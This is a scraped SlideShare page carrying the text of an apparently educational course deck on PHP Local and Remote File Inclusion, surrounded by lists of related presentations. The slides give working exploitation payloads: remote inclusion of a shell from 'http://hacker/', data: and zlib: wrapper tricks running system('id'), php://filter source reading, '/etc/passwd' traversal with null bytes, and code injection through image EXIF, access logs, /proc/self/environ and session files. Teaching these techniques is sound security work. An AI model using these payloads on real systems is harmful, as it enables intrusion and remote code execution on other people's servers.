SlideShare ist ein Scribd-Unternehmen logo

LFI

Михаил Фирстов
Михаил Фирстов

Part of course.

Bildung
1 von 19
Downloaden Sie, um offline zu lesen
LFI/RFI Local/Remote File Inclusion
WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php index.php <?php echo "123"; help.php User can set file with code, which will be included (executed or just printed out)
WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php <?php echo "123"; index.php help.php User can set file with code, which will be included (executed or just printed out)
WTF is LFI/RFI? <?php include $_GET['page']; ?> 123 User can set file with code, which will be included (executed or just printed out) <?php echo "123"; index.php help.php
PHP functions • include • include_once • require • require_once
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php 123123 <?php echo "123123"; ... shell.txt
LFI or RFI? Path in function before user's input? include('/tmp/'.$file) or include($file.'.php') Allow_url_fopen False True Allow_url_include False True RFILFI
RFI exploitation Simple, via site with your code ... include $_GET['url'].'.txt'; ... index.php /url=http://hacker/shell <?php system('uname -a'); ... shell.txt Linux ...
RFI exploitation Using wrappers (see SSRF) ... include $_GET['url'].'.txt'; ... index.php /url=data:,<?php system('id'); ?># id=1001 (www-data)... Slice path with "#" or "?" or use data:text/plain;base64,PD9wa..
RFI exploitation Protocol filter bypass using wrappers ... if (substr($_GET['url'], 0, 4) != 'http') { include $_GET['url']; } index.php /url=zlib:http://site/shell.php id=1001 (www-data)...
RFI exploitation Read files via php:// wrapper ... include $_GET['file']; ... index.php ?file=php://filter/ convert.base64-encode/ resource=index.php PD9waHA... base64("<?php...
LFI exploitation Require any local file ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=../../etc/passwd%00 Null byte work only with magic_quotes_gpc=off Try to use slashes technique ///[~4096]///.php (old php version)
LFI exploitation Upload file (probably image) with php-code and require it! ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=./uploads/images/1.jpg%00 Insert php code in EXIF tags or use PNG IDAT chunks technique ... <?php system('id'); ?> ... 1.jpg
LFI exploitation Find log file and insert your code via special crafted request ... include '/var/www/'.$_GET['file']; ... index.php ?file=../../../var/log/ apache2/access.log Many apps has log files with user's data from incoming requests, mail for example 1.4.7.7 - - [28/Mar/2016:10:22:04 -0300] "GET /?a=<?=@`$c`?> HTTP/1.0" 200 access.log ?a=<?@`$c`?>
LFI exploitation use ProcFS features ... include '/var/www/'.$_GET['file']; ... index.php /proc/self/fd/[0-9] apache log files located at 2 and 7 ... USER_AGENT=<?php system('id'); ?> ... environ ?file=../../proc/slef/environ%00 ... User-Agent: <?php system('id'); ?>
LFI exploitation Use session files ... $_SESSION['var'] = $_GET['var']; include '/var/www/'.$_GET['file']; ... index.php ?var=<?php phpinfo(); ? >&file=../../tmp/ sess_blablablabla blablablabla - PHPSESSID value
LFI exploitation phpinfo trick ... include '/var/www/'.$_GET['file']; ... index.php ... phpinfo(); ... i.php 1. Send $_FILE with shell.php 2. Parse temp filename, without closing socket 3. include file using temp file name

Empfohlen

LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web HackerМихаил Фирстов
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksImperva
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 
LFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptLFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptPrathan Phongthiproek
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
File inclusion
File inclusionFile inclusion
File inclusionAaftabKhan14
 

Empfohlen

LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web HackerМихаил Фирстов
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksImperva
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 
LFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptLFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptPrathan Phongthiproek
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
File inclusion
File inclusionFile inclusion
File inclusionAaftabKhan14
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php PresentationAlan Pinstein
 
PHP in one presentation
PHP in one presentationPHP in one presentation
PHP in one presentationMilad Rahimi
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Php
PhpPhp
Phpanandha ganesh
 
PHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksPHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksRoyston Olivera
 
Php technical presentation
Php technical presentationPhp technical presentation
Php technical presentationdharmendra kumar dhakar
 
Php Presentation
Php PresentationPhp Presentation
Php PresentationManish Bothra
 
PHP
PHPPHP
PHPMomentum Design Lab
 
01 Php Introduction
01 Php Introduction01 Php Introduction
01 Php IntroductionGeshan Manandhar
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHPCollaboration Technologies
 
php
phpphp
phpajeetjhajharia
 
Introduction To PHP
Introduction To PHPIntroduction To PHP
Introduction To PHPShweta A
 
A History of PHP
A History of PHPA History of PHP
A History of PHPXinchen Hui
 
Lfi
LfiLfi
Lfipenetration Tester
 
PHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsPHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsVibrant Technologies & Computers
 
Introduction to php web programming - get and post
Introduction to php web programming - get and postIntroduction to php web programming - get and post
Introduction to php web programming - get and postbaabtra.com - No. 1 supplier of quality freshers
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHPBradley Holt
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersMohammed Mushtaq Ahmed
 
Introduction to php
Introduction to phpIntroduction to php
Introduction to phpTaha Malampatti
 
Client side
Client sideClient side
Client sideМихаил Фирстов
 
Sql-Injection
Sql-InjectionSql-Injection
Sql-InjectionМихаил Фирстов
 

Weitere ähnliche Inhalte

Was ist angesagt?

Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php PresentationAlan Pinstein
 
PHP in one presentation
PHP in one presentationPHP in one presentation
PHP in one presentationMilad Rahimi
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
PHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksPHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksRoyston Olivera
 
Introduction To PHP
Introduction To PHPIntroduction To PHP
Introduction To PHPShweta A
 
A History of PHP
A History of PHPA History of PHP
A History of PHPXinchen Hui
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHPBradley Holt
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersMohammed Mushtaq Ahmed
 

Was ist angesagt? (20)

Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php Presentation
 
PHP in one presentation
PHP in one presentationPHP in one presentation
PHP in one presentation
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
Php
PhpPhp
Php
 
PHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksPHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and Frameworks
 
Php technical presentation
Php technical presentationPhp technical presentation
Php technical presentation
 
Php Presentation
Php PresentationPhp Presentation
Php Presentation
 
PHP
PHPPHP
PHP
 
01 Php Introduction
01 Php Introduction01 Php Introduction
01 Php Introduction
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHP
 
php
phpphp
php
 
Introduction To PHP
Introduction To PHPIntroduction To PHP
Introduction To PHP
 
A History of PHP
A History of PHPA History of PHP
A History of PHP
 
Lfi
LfiLfi
Lfi
 
PHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsPHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP Fundamentals
 
Introduction to php web programming - get and post
Introduction to php web programming - get and postIntroduction to php web programming - get and post
Introduction to php web programming - get and post
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHP
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginners
 
Introduction to php
Introduction to phpIntroduction to php
Introduction to php
 

Andere mochten auch

Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Jacqueline Vickery
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow
 
Sunny on Foody
Sunny on FoodySunny on Foody
Sunny on Foodymrp4
 
Le piattaforme per il social business
Le piattaforme per il social businessLe piattaforme per il social business
Le piattaforme per il social businesspiero itta
 
Cyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyCyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyLeandro Rangel
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Ansgar Jahns
 
Intestazione
IntestazioneIntestazione
Intestazionerifugiati
 
Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)Irvan R-ID
 
L1 seeingthings
L1 seeingthingsL1 seeingthings
L1 seeingthingsBoat Dock
 
parameter tampering
parameter tamperingparameter tampering
parameter tamperingIlsun Choi
 
Domanda protocollata
Domanda protocollataDomanda protocollata
Domanda protocollatanoicattaroweb
 

Andere mochten auch (20)

Client side
Client sideClient side
Client side
 
Sql-Injection
Sql-InjectionSql-Injection
Sql-Injection
 
Race condition
Race conditionRace condition
Race condition
 
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
 
Race condition
Race conditionRace condition
Race condition
 
Attacking MongoDB
Attacking MongoDBAttacking MongoDB
Attacking MongoDB
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
 
Mongo db eng
Mongo db engMongo db eng
Mongo db eng
 
Sunny on Foody
Sunny on FoodySunny on Foody
Sunny on Foody
 
Le piattaforme per il social business
Le piattaforme per il social businessLe piattaforme per il social business
Le piattaforme per il social business
 
Cyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyCyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.Joy
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021
 
Intestazione
IntestazioneIntestazione
Intestazione
 
PHP
PHPPHP
PHP
 
Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)
 
L1 seeingthings
L1 seeingthingsL1 seeingthings
L1 seeingthings
 
parameter tampering
parameter tamperingparameter tampering
parameter tampering
 
Quick Wins
Quick WinsQuick Wins
Quick Wins
 
Domanda protocollata
Domanda protocollataDomanda protocollata
Domanda protocollata
 
M Power
M PowerM Power
M Power
 

Ähnlich wie LFI

Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbaiUnmesh Baile
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Introducation to php for beginners
Introducation to php for beginners Introducation to php for beginners
Introducation to php for beginners musrath mohammad
 
Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbaivibrantuser
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confooterry chay
 
Zephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensionsZephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensionsMark Baker
 
GettingStartedWithPHP
GettingStartedWithPHPGettingStartedWithPHP
GettingStartedWithPHPNat Weerawan
 
Living With Legacy Code
Living With Legacy CodeLiving With Legacy Code
Living With Legacy CodeRowan Merewood
 
3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptech3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptechQuang Anh Le
 
07 build your-own_php_extension
07 build your-own_php_extension07 build your-own_php_extension
07 build your-own_php_extensionNguyen Duc Phu
 
Build your own PHP extension
Build your own PHP extensionBuild your own PHP extension
Build your own PHP extensionVõ Duy Tuấn
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 

Ähnlich wie LFI (20)

Php with my sql
Php with my sqlPhp with my sql
Php with my sql
 
Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbai
 
Key features PHP 5.3 - 5.6
Key features PHP 5.3 - 5.6Key features PHP 5.3 - 5.6
Key features PHP 5.3 - 5.6
 
Php mysql ppt
Php mysql pptPhp mysql ppt
Php mysql ppt
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Introducation to php for beginners
Introducation to php for beginners Introducation to php for beginners
Introducation to php for beginners
 
Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbai
 
Php mysql
Php mysqlPhp mysql
Php mysql
 
Php Tutorial
Php TutorialPhp Tutorial
Php Tutorial
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confoo
 
Zephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensionsZephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensions
 
GettingStartedWithPHP
GettingStartedWithPHPGettingStartedWithPHP
GettingStartedWithPHP
 
Hacking with hhvm
Hacking with hhvmHacking with hhvm
Hacking with hhvm
 
Living With Legacy Code
Living With Legacy CodeLiving With Legacy Code
Living With Legacy Code
 
3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptech3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptech
 
07 build your-own_php_extension
07 build your-own_php_extension07 build your-own_php_extension
07 build your-own_php_extension
 
Build your own PHP extension
Build your own PHP extensionBuild your own PHP extension
Build your own PHP extension
 
PHP
PHPPHP
PHP
 
Php mysql
Php mysqlPhp mysql
Php mysql
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧
 

Kürzlich hochgeladen

This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.christianmathematics
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...pradhanghanshyam7136
 
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...ZurliaSoop
 
Third Battle of Panipat detailed notes.pptx
Third Battle of Panipat detailed notes.pptxThird Battle of Panipat detailed notes.pptx
Third Battle of Panipat detailed notes.pptxAmita Gupta
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...Nguyen Thanh Tu Collection
 
How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17Celine George
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxVishalSingh1417
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxAreebaZafar22
 
The basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxThe basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxheathfieldcps1
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...Poonam Aher Patil
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.pptRamjanShidvankar
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxAmanpreet Kaur
 
psychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxpsychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxPoojaSen20
 
Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...Association for Project Management
 
Magic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptxMagic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptxdhanalakshmis0310
 
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfNirmal Dwivedi
 
Spellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseSpellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseAnaAcapella
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxVishalSingh1417
 

Kürzlich hochgeladen (20)

This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
 
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
 
Third Battle of Panipat detailed notes.pptx
Third Battle of Panipat detailed notes.pptxThird Battle of Panipat detailed notes.pptx
Third Battle of Panipat detailed notes.pptx
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
 
How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptx
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
The basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxThe basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptx
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
psychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxpsychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docx
 
Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...
 
Magic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptxMagic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptx
 
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
 
Spellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseSpellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please Practise
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptx
 
Spatium Project Simulation student brief
Spatium Project Simulation student briefSpatium Project Simulation student brief
Spatium Project Simulation student brief
 

LFI

  • 2. WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php index.php <?php echo "123"; help.php User can set file with code, which will be included (executed or just printed out)
  • 3. WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php <?php echo "123"; index.php help.php User can set file with code, which will be included (executed or just printed out)
  • 4. WTF is LFI/RFI? <?php include $_GET['page']; ?> 123 User can set file with code, which will be included (executed or just printed out) <?php echo "123"; index.php help.php
  • 5. PHP functions • include • include_once • require • require_once
  • 6. So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
  • 7. So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
  • 8. So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php 123123 <?php echo "123123"; ... shell.txt
  • 9. LFI or RFI? Path in function before user's input? include('/tmp/'.$file) or include($file.'.php') Allow_url_fopen False True Allow_url_include False True RFILFI
  • 10. RFI exploitation Simple, via site with your code ... include $_GET['url'].'.txt'; ... index.php /url=http://hacker/shell <?php system('uname -a'); ... shell.txt Linux ...
  • 11. RFI exploitation Using wrappers (see SSRF) ... include $_GET['url'].'.txt'; ... index.php /url=data:,<?php system('id'); ?># id=1001 (www-data)... Slice path with "#" or "?" or use data:text/plain;base64,PD9wa..
  • 12. RFI exploitation Protocol filter bypass using wrappers ... if (substr($_GET['url'], 0, 4) != 'http') { include $_GET['url']; } index.php /url=zlib:http://site/shell.php id=1001 (www-data)...
  • 13. RFI exploitation Read files via php:// wrapper ... include $_GET['file']; ... index.php ?file=php://filter/ convert.base64-encode/ resource=index.php PD9waHA... base64("<?php...
  • 14. LFI exploitation Require any local file ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=../../etc/passwd%00 Null byte work only with magic_quotes_gpc=off Try to use slashes technique ///[~4096]///.php (old php version)
  • 15. LFI exploitation Upload file (probably image) with php-code and require it! ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=./uploads/images/1.jpg%00 Insert php code in EXIF tags or use PNG IDAT chunks technique ... <?php system('id'); ?> ... 1.jpg
